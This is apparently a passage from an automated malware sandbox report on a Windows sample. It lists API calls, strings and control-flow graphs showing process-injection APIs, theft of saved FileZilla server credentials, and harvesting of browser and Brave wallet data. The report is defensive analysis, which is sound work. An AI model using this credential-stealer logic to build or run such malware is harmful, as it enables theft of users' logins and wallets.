                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep$AddressProc$Heap$Process$File$CloseCreateEventHandleLibraryLoadWindowlstrcpy$ExitMessageOpenmemsetstrcmp$AllocAllocateByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiNamePathReadRegisterSectionSpinTempUserVisibleWideWrite_time64lstrcatlstrlenrandsrandwsprintf
                                                                                                                                                                                      • String ID: GetSystemInfo$GetSystemTime$Sleep
                                                                                                                                                                                      • API String ID: 1759865767-3040144824
                                                                                                                                                                                      • Opcode ID: 5ef56ac24cd95238b9ef26ea25e5ef20bfa433a8fe682aeec83b04af3709624b
                                                                                                                                                                                      • Instruction ID: 95552c75dedf024c4970727e2ff40c3501d86d41b8bafe9688b9526500adf2e6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ef56ac24cd95238b9ef26ea25e5ef20bfa433a8fe682aeec83b04af3709624b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 40F1A4B180B516ABD7C2BBF0EC4DCDEBA7CAE467027018524F71AA5061DF2856C38B65
                                                                                                                                                                                      Function 00355EDC Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 603 355edc-355ee3 604 355ee9-356356 GetProcAddress * 50 603->604 605 35635b-3563fa LoadLibraryA * 9 603->605 604->605 606 3563fc-356465 GetProcAddress * 5 605->606 607 35646a-356471 605->607 606->607 608 356477-356525 GetProcAddress * 8 607->608 609 35652a-356531 607->609 608->609 610 3565a1-3565a8 609->610 611 356533-35659c GetProcAddress * 5 609->611 612 356633-35663a 610->612 613 3565ae-35662e GetProcAddress * 6 610->613 611->610 614 356640-356705 GetProcAddress * 9 612->614 615 35670a-356711 612->615 613->612 614->615 616 356781-356788 615->616 617 356713-35677c GetProcAddress * 5 615->617 618 3567b3-3567ba 616->618 619 35678a-3567ae GetProcAddress * 2 616->619 617->616 620 3567e5-3567ec 618->620 621 3567bc-3567e0 GetProcAddress * 2 618->621 619->618 622 3568d1-3568d8 620->622 623 3567f2-3568cc GetProcAddress * 10 620->623 621->620 624 356931-356938 622->624 625 3568da-35692c GetProcAddress * 4 622->625 623->622 626 35694c-356953 624->626 627 35693a-356947 GetProcAddress 624->627 625->624 628 356955-3569a7 GetProcAddress * 4 626->628 629 3569ac-3569b3 626->629 627->626 628->629 630 3569b5-3569c1 GetProcAddress 629->630 631 3569c6 629->631 630->631
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                      • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                      • API String ID: 2238633743-2740034357
                                                                                                                                                                                      • Opcode ID: 6039fd22c81bf9552f777e8f95d89385333c3c7a08ce69ef3a65fc3000bc13c5
                                                                                                                                                                                      • Instruction ID: 40b57893b8fe9a6ca1be1fd16e1ff51a611149c92b6b0a8fbb9aad19e5059180
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6039fd22c81bf9552f777e8f95d89385333c3c7a08ce69ef3a65fc3000bc13c5
                                                                                                                                                                                      • Instruction Fuzzy Hash: F152BD75509600EFEB02DFE0EE4996D3B76F748381344C5A6F90A91A70D7B24AA3EF50
                                                                                                                                                                                      Function 0034B030 Relevance: 73.8, APIs: 31, Strings: 11, Instructions: 339stringmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 636 34b030-34b0c6 call 34e57d call 34f83b call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e5b4 call 3469a2 659 34b0cc-34b0db call 34f884 636->659 660 34b45a-34b46e call 34e5e8 call 341301 636->660 659->660 666 34b0e1-34b131 strtok_s call 34e57d * 4 GetProcessHeap HeapAlloc 659->666 676 34b137 666->676 677 34b3c9-34b455 lstrlenA call 34e57d call 341324 call 3526f8 call 34e5e8 memset call 34e72d * 4 call 34e5e8 * 4 666->677 679 34b13c-34b14a StrStrA 676->679 677->660 680 34b177-34b185 StrStrA 679->680 681 34b14c-34b172 lstrlenA call 34fc4f call 34e63b call 34e5e8 679->681 684 34b187-34b1b3 lstrlenA call 34fc4f call 34e63b call 34e5e8 680->684 685 34b1b8-34b1c6 StrStrA 680->685 681->680 684->685 690 34b1f3-34b201 StrStrA 685->690 691 34b1c8-34b1ee lstrlenA call 34fc4f call 34e63b call 34e5e8 685->691 693 34b274-34b288 call 34e766 lstrlenA 690->693 694 34b203-34b249 lstrlenA call 34fc4f call 34e63b call 34e5e8 call 34e766 call 346a41 690->694 691->690 712 34b3ad-34b3c3 strtok_s 693->712 713 34b28e-34b29f call 34e766 lstrlenA 693->713 694->693 738 34b24b-34b26f call 34e5f1 call 34e6d4 call 34e63b call 34e5e8 694->738 712->677 712->679 713->712 725 34b2a5-34b2b6 call 34e766 lstrlenA 713->725 725->712 732 34b2bc-34b2cd call 34e766 lstrlenA 725->732 732->712 742 34b2d3-34b3a8 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 3 call 34e766 lstrcatA * 3 call 34e766 lstrcatA * 3 call 34e5f1 * 4 732->742 738->693 742->712
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0034B0EA
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,0035E266,0035E266,0035E266,0035E266), ref: 0034B11F
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0034B126
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0034B142
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B14D
                                                                                                                                                                                        • Part of subcall function 0034FC4F: malloc.MSVCRT ref: 0034FC58
                                                                                                                                                                                        • Part of subcall function 0034FC4F: strncpy.MSVCRT ref: 0034FC68
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0034B17D
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B188
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0034B1BE
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B1C9
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0034B1F9
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B204
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B27D
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B297
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B2AE
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B2C5
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Soft: FileZilla), ref: 0034B2DB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Host: ), ref: 0034B2E9
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B2FB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361448), ref: 0034B309
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B31B
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B325
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Login: ), ref: 0034B333
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B345
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B34F
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Password: ), ref: 0034B35D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B36F
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B379
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B383
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0034B3B7
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0034B3CC
                                                                                                                                                                                      • memset.MSVCRT ref: 0034B412
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$f5$passwords.txt
                                                                                                                                                                                      • API String ID: 433178851-3814401924
                                                                                                                                                                                      • Opcode ID: d888f9792c4465902d4fe6fc3947a9c4d509f65d5633878a22fc916ed5d82b59
                                                                                                                                                                                      • Instruction ID: 0e1963e4bf6bfc3aab2b20eee81cac56d4a2829d49d8f48b1fa5ce9a95497443
                                                                                                                                                                                      • Opcode Fuzzy Hash: d888f9792c4465902d4fe6fc3947a9c4d509f65d5633878a22fc916ed5d82b59
                                                                                                                                                                                      • Instruction Fuzzy Hash: BDC12B71900108ABDB06FBE0DD96DEEBBBCBF55301F544465F502AA0A2EF31AB45DB60
                                                                                                                                                                                      Function 0034B957 Relevance: 48.0, APIs: 20, Strings: 7, Instructions: 742fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1817 34b957-34b9d8 call 34e57d call 34e682 call 34e6d4 call 34e63b call 34e5e8 * 2 call 34e57d * 2 call 34e766 FindFirstFileA 1836 34c38c-34c3cb call 34e5e8 * 3 call 341301 call 34e5e8 * 3 1817->1836 1837 34b9de-34b9e4 1817->1837 1839 34b9e9-34b9fd StrCmpCA 1837->1839 1841 34ba03-34ba17 StrCmpCA 1839->1841 1842 34c36b-34c37d FindNextFileA 1839->1842 1841->1842 1844 34ba1d-34ba89 call 34e5f1 call 34e682 call 34e6d4 * 2 call 34e63b call 34e5e8 * 3 1841->1844 1842->1839 1845 34c383-34c386 FindClose 1842->1845 1873 34ba8f-34baae call 34e766 StrCmpCA 1844->1873 1874 34bb99-34bc04 call 34e6d4 * 4 call 34e63b call 34e5e8 * 3 1844->1874 1845->1836 1880 34bb26-34bb97 call 34e6d4 * 4 call 34e63b call 34e5e8 * 3 1873->1880 1881 34bab0-34bb21 call 34e6d4 * 4 call 34e63b call 34e5e8 * 3 1873->1881 1923 34bc0a-34bc28 call 34e5e8 call 34e766 StrCmpCA 1874->1923 1880->1923 1881->1923 1932 34bc2e-34bc42 StrCmpCA 1923->1932 1933 34bdda-34bdef StrCmpCA 1923->1933 1932->1933 1934 34bc48-34bd6a call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 * 2 CopyFileA call 34e57d call 34e6d4 * 2 call 34e63b call 34e5e8 * 2 call 34e5b4 call 3469a2 1932->1934 1935 34bdf1-34be38 call 341324 call 34e5b4 * 3 call 34b5e5 1933->1935 1936 34be48-34be5d StrCmpCA 1933->1936 2134 34bd6c-34bda6 call 34e5b4 call 341324 call 3526f8 call 34e5e8 1934->2134 2135 34bdab-34bdd5 call 34e766 DeleteFileA call 34e72d call 34e766 call 34e5e8 * 2 1934->2135 1996 34be3d-34be43 1935->1996 1937 34bec5-34bedd call 34e5b4 call 34f80b 1936->1937 1938 34be5f-34be76 call 34e766 StrCmpCA 1936->1938 1960 34bf44-34bf59 StrCmpCA 1937->1960 1961 34bedf-34bee3 1937->1961 1949 34c2f6-34c2fd 1938->1949 1950 34be7c-34be80 1938->1950 1957 34c2ff-34c350 call 34e5b4 * 2 call 34e57d call 341324 call 34b957 1949->1957 1958 34c35b-34c366 call 34e72d * 2 1949->1958 1950->1949 1954 34be86-34bec3 call 341324 call 34e5b4 * 2 1950->1954 2008 34bf29-34bf34 call 34e5b4 call 346e1b 1954->2008 2022 34c355 1957->2022 1958->1842 1973 34c154-34c169 StrCmpCA 1960->1973 1974 34bf5f-34c01b call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 * 2 CopyFileA 1960->1974 1961->1949 1968 34bee9-34bf26 call 341324 call 34e5b4 call 34e57d 1961->1968 1968->2008 1973->1949 1977 34c16f-34c22b call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 * 2 CopyFileA 1973->1977 2088 34c0c7-34c0e0 call 34e766 StrCmpCA 1974->2088 2089 34c021-34c0bc call 341324 call 34e5b4 * 3 call 34736c call 341324 call 34e5b4 * 3 call 347bb0 1974->2089 2090 34c2d7-34c2e9 call 34e766 DeleteFileA call 34e72d 1977->2090 2091 34c231-34c2cc call 341324 call 34e5b4 * 3 call 34764a call 341324 call 34e5b4 * 3 call 3478c0 1977->2091 1996->1949 2028 34bf39-34bf3f 2008->2028 2022->1958 2028->1949 2101 34c135-34c147 call 34e766 DeleteFileA call 34e72d 2088->2101 2102 34c0e2-34c12a call 341324 call 34e5b4 * 3 call 3480a3 2088->2102 2180 34c0c1 2089->2180 2116 34c2ee 2090->2116 2181 34c2d1 2091->2181 2124 34c14c-34c14f 2101->2124 2158 34c12f 2102->2158 2122 34c2f1 call 34e5e8 2116->2122 2122->1949 2124->2122 2134->2135 2135->1933 2158->2101 2180->2088 2181->2090
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,0035E266,0035E266,00000000,?,?,?,003614B4,0035E266,00000000,0035E266,?), ref: 0034B9CC
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 0034B9F5
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 0034BA0F
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,0035E264,?,?,0035E266), ref: 0034BAA0
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,0035E264,?,?,0035E264,?,00000000,?,?,?,0035E264,?,?), ref: 0034BC20
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Preferences), ref: 0034BC3A
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034BCF4
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0034BDB4
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0034BDE7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034B5E5: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034B6A1
                                                                                                                                                                                        • Part of subcall function 0034B5E5: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0034B6F8
                                                                                                                                                                                        • Part of subcall function 0034B5E5: RtlAllocateHeap.NTDLL(00000000), ref: 0034B6FF
                                                                                                                                                                                        • Part of subcall function 0034B957: StrCmpCA.SHLWAPI(?), ref: 0034BE55
                                                                                                                                                                                        • Part of subcall function 0034B957: StrCmpCA.SHLWAPI(00000000), ref: 0034BE6E
                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0034C375
                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0034C386
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$File$Find$CopyHeaplstrcatlstrlen$AllocateCloseDeleteFirstNextProcess
                                                                                                                                                                                      • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences$d5$f5
                                                                                                                                                                                      • API String ID: 1925285837-3618002337
                                                                                                                                                                                      • Opcode ID: 2cc66edc914313a54b541a8a3c71df1cbca029382fcf4526fc1012e085a134ab
                                                                                                                                                                                      • Instruction ID: 8406eed7e03b5f07313d9244970b6416e2c0d160132222a37fd87f0361261927
